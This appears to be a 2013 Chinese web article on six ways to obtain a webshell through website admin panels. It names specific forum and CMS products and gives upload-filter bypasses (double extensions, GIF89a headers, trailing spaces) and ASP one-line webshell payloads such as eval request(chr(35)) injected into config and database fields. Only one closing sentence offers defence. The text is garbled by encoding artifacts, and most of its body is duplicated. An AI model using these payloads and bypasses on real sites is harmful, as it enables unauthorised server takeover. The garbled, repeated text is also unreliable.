六種后臺(tái)拿shell的方法
發(fā)布時(shí)間:2013-01-10 12:46:58 作者:佚名
我要評(píng)論
一直以來(lái)很多我網(wǎng)站都被植入了很多后門(mén),這里簡(jiǎn)單的分下黑客常用的手段,方便管理員或站長(zhǎng)注意防御
一、直接上傳獲得
這種對(duì)php和jsp的一些程序比較常見(jiàn),MolyX BOARD就是其中一例,直接在心情圖標(biāo)管理上傳.php類(lèi)型,雖然沒(méi)有提示,其實(shí)已經(jīng)成功了,上傳的文 件url應(yīng)該是/imsges/smiles下,以前的聯(lián)眾游戲站和網(wǎng)易的jsp系統(tǒng)漏洞就可以直接上傳jsp文件。文 件名是原來(lái)的文件名,bo-blog后臺(tái)可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動(dòng)網(wǎng) 5.0和6.0、早期的許多整站系統(tǒng)),因過(guò)濾上傳文件不嚴(yán),導(dǎo)致用戶可以直接上傳webshell到網(wǎng)站任意可寫(xiě)目錄中,從而拿到網(wǎng)站的管理員控制權(quán) 限。
二、添加修改上傳類(lèi)型
現(xiàn)在很多的腳本程序上傳模塊不是只允許上傳合法文件類(lèi)型,而大多數(shù)的系統(tǒng)是允許 添加上傳類(lèi)型,bbsxp后臺(tái)可以添加asa|asP類(lèi)型,ewebeditor的后臺(tái)也可添加asa類(lèi)型,通過(guò)修改后我們可以直接上傳asa后綴的 webshell了,還有一種情況是過(guò)濾了.asp,可以添加.aspasp的文件類(lèi)型來(lái)上傳獲得webshell。php系統(tǒng)的后臺(tái),我們可以添 加.php.g1f的上傳類(lèi)型,這是php的一個(gè)特性,最后的哪個(gè)只要不是已知的文件類(lèi)型即可,php會(huì)將php.g1f作為.php來(lái)正常運(yùn)行,從而也 可成功拿到shell。LeadBbs3.14后臺(tái)獲得webshell方法是:在上傳類(lèi)型中增加asp ,注意,asp后面是有個(gè)空格的,然后在前臺(tái)上傳ASP馬,當(dāng)然也要在后面加個(gè)空格!
三、利用后臺(tái)管理功能寫(xiě)入
上傳漏洞基本上補(bǔ)的也差不多了,所以我們進(jìn)入后臺(tái)后還可以通過(guò)修改相關(guān)文件來(lái)寫(xiě)入webshell。比較的典型的有dvbbs6.0,還有 leadbbs2.88等,直接在后臺(tái)修改配置文件,寫(xiě)入后綴是asp的文件。而LeadBbs3.14后臺(tái)獲得webshell另一方法是:添加一個(gè)新 的友情鏈接,在網(wǎng)站名稱(chēng)處寫(xiě)上冰狐最小馬即可,最小馬前后要隨便輸入一些字符,http:\\網(wǎng)站\inc\IncHtm\BoardLink.asp就 是我們想要的shell。
四、利用后臺(tái)管理向配置文件寫(xiě)
利用\"\"\"\":\"\"//\"等符號(hào) 構(gòu)造最小馬寫(xiě)入程序的配置文件,joekoe論壇,某某同學(xué)錄,沸騰展望新聞系統(tǒng),COCOON Counter統(tǒng)計(jì)程序等等,還有很多php程序都可以,COCOON Counter統(tǒng)計(jì)程序舉例,在管理郵箱處添上cnhacker@263.net\":eval request(chr (35))//, 在配制文件中就是webmail=\"cnhacker@263.net\\":eval request(chr(35))//\",還有一種方法就是寫(xiě)上 cnhacker@263.net\"%><%eval request(chr(35))%><%\',這樣就會(huì)形成前后對(duì)應(yīng),最小馬也就運(yùn)行了。<%eval request(chr(35))%>可以用lake2的eval發(fā)送端以及最新的2006 客戶端來(lái)連,需要說(shuō)明的是數(shù)據(jù)庫(kù)插馬時(shí)候要選前者。再如動(dòng)易2005,到文章中心管理-頂部菜單設(shè)置-菜單其它特效,插入一句話\"%><%execute request(\"l\")%><%\',保 存頂部欄目菜單參數(shù)設(shè)置成功后,我們就得到馬地址http://網(wǎng)站/admin/rootclass_menu_config.asp。
五、利用后臺(tái)數(shù)據(jù)庫(kù)備份及恢復(fù)獲得
主要是利用后臺(tái)對(duì)access數(shù)據(jù)庫(kù)的“備份數(shù)據(jù)庫(kù)”或“恢復(fù)數(shù)據(jù)庫(kù)”功能,“備份的數(shù)據(jù)庫(kù)路徑”等變量沒(méi)有過(guò)濾導(dǎo)致可以把任意文件后綴改 為asp,從而得到webshell,msssql版的程序就直接應(yīng)用了access版的代碼,導(dǎo)致sql版照樣可以利用。還可以備份網(wǎng)站asp文件為其 他后綴 如.txt文件,從而可以查看并獲得網(wǎng)頁(yè)源代碼,并獲得更多的程序信息增加獲得webshell的機(jī)會(huì)。在實(shí)際運(yùn)用中經(jīng)常會(huì)碰到?jīng)]有上傳功能的時(shí) 候,但是有asp系統(tǒng)在運(yùn)行,利用此方法來(lái)查看源代碼來(lái)獲得其數(shù)據(jù)庫(kù)的位置,為數(shù)據(jù)庫(kù)馬來(lái)創(chuàng)造機(jī)會(huì),動(dòng)網(wǎng)論壇就有一個(gè)ip地址的數(shù)據(jù)庫(kù),在后臺(tái)的ip管理 中可以插入最小馬然后備份成.asp文件即可。在談?wù)勍黄粕蟼鳈z測(cè)的方法,很多asp程序在即使改了后綴名后也會(huì)提示文件非法,通過(guò)在.asp文件頭加上 gif89a修改后綴為gif來(lái)騙過(guò)asp程序檢測(cè)達(dá)到上傳的目的,還有一種就是用記事本打開(kāi)圖片文件,隨便粘貼一部分復(fù)制到asp木馬文件頭,修改 gif后綴后上傳也可以突破檢測(cè),然后備份為.asp文件,成功得到webshell。
六、利用數(shù)據(jù)庫(kù)壓縮功能
可以將數(shù)據(jù)的防下載失效從而使插入數(shù)據(jù)庫(kù)的最小馬成功運(yùn)行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫(xiě)上<%eval request (chr(35))%>, 提交后,在數(shù)據(jù)庫(kù)操作中壓縮數(shù)據(jù)庫(kù),可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個(gè)webshell。
由上可知道我們最好將一些不常用的功能關(guān)閉,關(guān)閉部分目錄可執(zhí)行目錄的權(quán)限,禁止修改配置文件等等,注意與服務(wù)器結(jié)合好。
這種對(duì)php和jsp的一些程序比較常見(jiàn),MolyX BOARD就是其中一例,直接在心情圖標(biāo)管理上傳.php類(lèi)型,雖然沒(méi)有提示,其實(shí)已經(jīng)成功了,上傳的文 件url應(yīng)該是/imsges/smiles下,以前的聯(lián)眾游戲站和網(wǎng)易的jsp系統(tǒng)漏洞就可以直接上傳jsp文件。文 件名是原來(lái)的文件名,bo-blog后臺(tái)可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動(dòng)網(wǎng) 5.0和6.0、早期的許多整站系統(tǒng)),因過(guò)濾上傳文件不嚴(yán),導(dǎo)致用戶可以直接上傳webshell到網(wǎng)站任意可寫(xiě)目錄中,從而拿到網(wǎng)站的管理員控制權(quán) 限。
二、添加修改上傳類(lèi)型
現(xiàn)在很多的腳本程序上傳模塊不是只允許上傳合法文件類(lèi)型,而大多數(shù)的系統(tǒng)是允許 添加上傳類(lèi)型,bbsxp后臺(tái)可以添加asa|asP類(lèi)型,ewebeditor的后臺(tái)也可添加asa類(lèi)型,通過(guò)修改后我們可以直接上傳asa后綴的 webshell了,還有一種情況是過(guò)濾了.asp,可以添加.aspasp的文件類(lèi)型來(lái)上傳獲得webshell。php系統(tǒng)的后臺(tái),我們可以添 加.php.g1f的上傳類(lèi)型,這是php的一個(gè)特性,最后的哪個(gè)只要不是已知的文件類(lèi)型即可,php會(huì)將php.g1f作為.php來(lái)正常運(yùn)行,從而也 可成功拿到shell。LeadBbs3.14后臺(tái)獲得webshell方法是:在上傳類(lèi)型中增加asp ,注意,asp后面是有個(gè)空格的,然后在前臺(tái)上傳ASP馬,當(dāng)然也要在后面加個(gè)空格!
三、利用后臺(tái)管理功能寫(xiě)入
上傳漏洞基本上補(bǔ)的也差不多了,所以我們進(jìn)入后臺(tái)后還可以通過(guò)修改相關(guān)文件來(lái)寫(xiě)入webshell。比較的典型的有dvbbs6.0,還有 leadbbs2.88等,直接在后臺(tái)修改配置文件,寫(xiě)入后綴是asp的文件。而LeadBbs3.14后臺(tái)獲得webshell另一方法是:添加一個(gè)新 的友情鏈接,在網(wǎng)站名稱(chēng)處寫(xiě)上冰狐最小馬即可,最小馬前后要隨便輸入一些字符,http:\\網(wǎng)站\inc\IncHtm\BoardLink.asp就 是我們想要的shell。
四、利用后臺(tái)管理向配置文件寫(xiě)
利用\"\"\"\":\"\"//\"等符號(hào) 構(gòu)造最小馬寫(xiě)入程序的配置文件,joekoe論壇,某某同學(xué)錄,沸騰展望新聞系統(tǒng),COCOON Counter統(tǒng)計(jì)程序等等,還有很多php程序都可以,COCOON Counter統(tǒng)計(jì)程序舉例,在管理郵箱處添上cnhacker@263.net\":eval request(chr (35))//, 在配制文件中就是webmail=\"cnhacker@263.net\\":eval request(chr(35))//\",還有一種方法就是寫(xiě)上 cnhacker@263.net\"%><%eval request(chr(35))%><%\',這樣就會(huì)形成前后對(duì)應(yīng),最小馬也就運(yùn)行了。<%eval request(chr(35))%>可以用lake2的eval發(fā)送端以及最新的2006 客戶端來(lái)連,需要說(shuō)明的是數(shù)據(jù)庫(kù)插馬時(shí)候要選前者。再如動(dòng)易2005,到文章中心管理-頂部菜單設(shè)置-菜單其它特效,插入一句話\"%><%execute request(\"l\")%><%\',保 存頂部欄目菜單參數(shù)設(shè)置成功后,我們就得到馬地址http://網(wǎng)站/admin/rootclass_menu_config.asp。
五、利用后臺(tái)數(shù)據(jù)庫(kù)備份及恢復(fù)獲得
主要是利用后臺(tái)對(duì)access數(shù)據(jù)庫(kù)的“備份數(shù)據(jù)庫(kù)”或“恢復(fù)數(shù)據(jù)庫(kù)”功能,“備份的數(shù)據(jù)庫(kù)路徑”等變量沒(méi)有過(guò)濾導(dǎo)致可以把任意文件后綴改 為asp,從而得到webshell,msssql版的程序就直接應(yīng)用了access版的代碼,導(dǎo)致sql版照樣可以利用。還可以備份網(wǎng)站asp文件為其 他后綴 如.txt文件,從而可以查看并獲得網(wǎng)頁(yè)源代碼,并獲得更多的程序信息增加獲得webshell的機(jī)會(huì)。在實(shí)際運(yùn)用中經(jīng)常會(huì)碰到?jīng)]有上傳功能的時(shí) 候,但是有asp系統(tǒng)在運(yùn)行,利用此方法來(lái)查看源代碼來(lái)獲得其數(shù)據(jù)庫(kù)的位置,為數(shù)據(jù)庫(kù)馬來(lái)創(chuàng)造機(jī)會(huì),動(dòng)網(wǎng)論壇就有一個(gè)ip地址的數(shù)據(jù)庫(kù),在后臺(tái)的ip管理 中可以插入最小馬然后備份成.asp文件即可。在談?wù)勍黄粕蟼鳈z測(cè)的方法,很多asp程序在即使改了后綴名后也會(huì)提示文件非法,通過(guò)在.asp文件頭加上 gif89a修改后綴為gif來(lái)騙過(guò)asp程序檢測(cè)達(dá)到上傳的目的,還有一種就是用記事本打開(kāi)圖片文件,隨便粘貼一部分復(fù)制到asp木馬文件頭,修改 gif后綴后上傳也可以突破檢測(cè),然后備份為.asp文件,成功得到webshell。
六、利用數(shù)據(jù)庫(kù)壓縮功能
可以將數(shù)據(jù)的防下載失效從而使插入數(shù)據(jù)庫(kù)的最小馬成功運(yùn)行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫(xiě)上<%eval request (chr(35))%>, 提交后,在數(shù)據(jù)庫(kù)操作中壓縮數(shù)據(jù)庫(kù),可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個(gè)webshell。
由上可知道我們最好將一些不常用的功能關(guān)閉,關(guān)閉部分目錄可執(zhí)行目錄的權(quán)限,禁止修改配置文件等等,注意與服務(wù)器結(jié)合好。
相關(guān)文章
- 最近看到網(wǎng)上曝出的dedecms最新版本的一個(gè)注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開(kāi).但是在我實(shí)際測(cè)試過(guò)程當(dāng)中,發(fā)現(xiàn)無(wú)法復(fù)現(xiàn)2013-06-11
- SQL注入攻擊的危害性很大。在講解其防止辦法之前,數(shù)據(jù)庫(kù)管理員有必要先了解一下其攻擊的原理。這有利于管理員采取有針對(duì)性的防治措施2012-07-10
訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說(shuō)明
訊時(shí)系統(tǒng)(xuas)最新通殺漏洞0day圖文說(shuō)明,使用訊時(shí)網(wǎng)站管理系統(tǒng)的朋友可以參考下。2011-07-15- php后門(mén)木馬對(duì)大家來(lái)說(shuō)一點(diǎn)都不陌生吧,但是它的種類(lèi)您又知多少呢2012-06-28
- 不知道各位。在上傳的時(shí)候。 有沒(méi)需要過(guò)。 一個(gè)上傳。 不修改名字。。然后上傳目錄已經(jīng)被程序所定義了。2011-04-01
phpcms2008 代碼執(zhí)行 批量getshell EXP(使用菜刀)
這篇文章主要介紹了phpcms2008 代碼執(zhí)行 批量getshell EXP的相關(guān)資料,需要的朋友可以參考下2014-05-09- php后臺(tái)插一句話的思路加114網(wǎng)址導(dǎo)航后臺(tái)拿webshell的方法。2011-09-29
網(wǎng)站后臺(tái)腳本漏洞挖掘技巧,基于工具快速挖掘
現(xiàn)在很多搞web開(kāi)發(fā)的人,腳本安全做得真爛,簡(jiǎn)單而又“復(fù)雜”過(guò)濾兩下,事實(shí)上根本沒(méi)理解到真正的方法,也怪90%的腳本書(shū)上只講語(yǔ)法,順便鄙視下國(guó)內(nèi)那些XX磚家寫(xiě)的書(shū),不講2011-05-15- 在網(wǎng)上也有什么訊時(shí)三板斧的文章..但我個(gè)人覺(jué)得有時(shí)候靠那三種還是入侵不了(隨著版本的更新)2011-07-15
- 大家都知道,沒(méi)有一臺(tái)電腦是完全安全的,都有一個(gè)攻破點(diǎn),下面小編就以實(shí)例來(lái)講解一下,一起來(lái)看看吧2016-09-01

